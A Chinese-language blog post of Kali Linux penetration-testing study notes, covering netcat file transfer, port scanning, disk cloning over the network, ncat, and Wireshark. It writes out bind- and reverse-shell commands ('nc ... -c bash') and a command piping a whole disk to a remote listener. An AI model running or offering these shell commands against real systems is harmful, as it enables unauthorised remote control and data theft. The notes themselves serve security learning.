kali渗透学习-基础知识和工具

kali渗透学习
下载官方镜像可以利用官方提供的hash值对比下载iso文件是否完整。下载好iso后用sha1sum进行摘要计算得到hash值
在和官方对比无误后,为完整的
使用vbox(ensp里的vbox可能是低版本bug,因为我这台电脑需要使用ensp)搭建环境会出现与真实主机无法复制粘贴情况,所以我用vmware做的主机环境
ls -lh --sort=size 根据文件大小排序
netstat -pantu 查看当前电脑与哪一些服务器产生了tcp/udp的连接
find . -name “ps*” -exec cp {} /tmp/{}.bak ;

nc远程连接传输工具(电子取证)
nc -nv ip port连接服务器
远程传输文本电子取证有用
服务端打开端口连接
nc -lp 端口
客户端
nc -nv 连接
可以将被审计主机的信息专递给审计主机
文件传输
A:nc -lp 端口 > 文件
nc -nv ip 端口 < 文件 -q 1(传输完成间隔1s中断连接)
B: nc -lp 端口 < 文件
nc -nv ip 端口 > 文件 -q 1
目录传输
A:tar -cvf -(注意这里有个) music/ | nc -ql 端口 -q 1
B: nc -nv ip 端口 | tar -xvf -
加密传输文件
A:nc -lp 端口 | mcrypt -flush -Fbqd -a rijndael-256-m ecb > 文件
B: mcrypt -flush -Fbq -a rijndael-256-m ecb < 文件 | nc -nv ip 端口 -q 1
流媒体服务
A:cat 1.pm4 | nc -lp 端口
B: nc -nv ip 端口| mplayer -vo x11 -cache 3000 -
端口扫描(不一定准确)
nc -nvz ip 1-56635(端口范围tcp)(会有缓存结果下一次直接就可以查询到)
nc -nvzu ip 1-56635(端口范围udp)
远程克隆硬盘
A:nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv ip 333 -q 1 (通过dd块来复制文件)
文件删除恢复的原理,文件创建写入的时候,文件是写入磁道,操作系统删除的时候。文件是相当于被操作系统标记删除了就不会出现
在目录中(也告知操作系统这段磁道是可以覆盖新数据的),但是实际上磁道上的数据没有清理,这就有了恢复的可能性
远程控制
正向:
A: nc -lp 333 -c bash
B: nc -nv 192.168.43.114 333
反向:(反向渗透多一些,正向在靶机上开端口容易被防火墙阻断)
A:nc -nv 192.168.43.114 333 -c bash
B:nc -lp 333
windos改bash为cmd

ncat(我的版本中没有)
由于nc缺乏加密身份验证能力(明文传输),容易被嗅探到,开放端口被其他黑客扫描,所以推出ncat工具
A:ncat -c bash --allow 192.168.43.81 -vnl 333 --ssl
B: ncat -nv 192.168.43.114 333 -ssl

wireshark使用
混杂模式:不勾选的话只会抓取涉及这张网卡ip地址mac的流量,勾选了才会抓取经过这张网卡的所有流量

tcpdum的使用

TrueCrypt加密,可以双重加密文件磁盘,第一层密码给不想看的人看,第二层密码给自己看(hidden truecrypt volume隐藏加密)

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值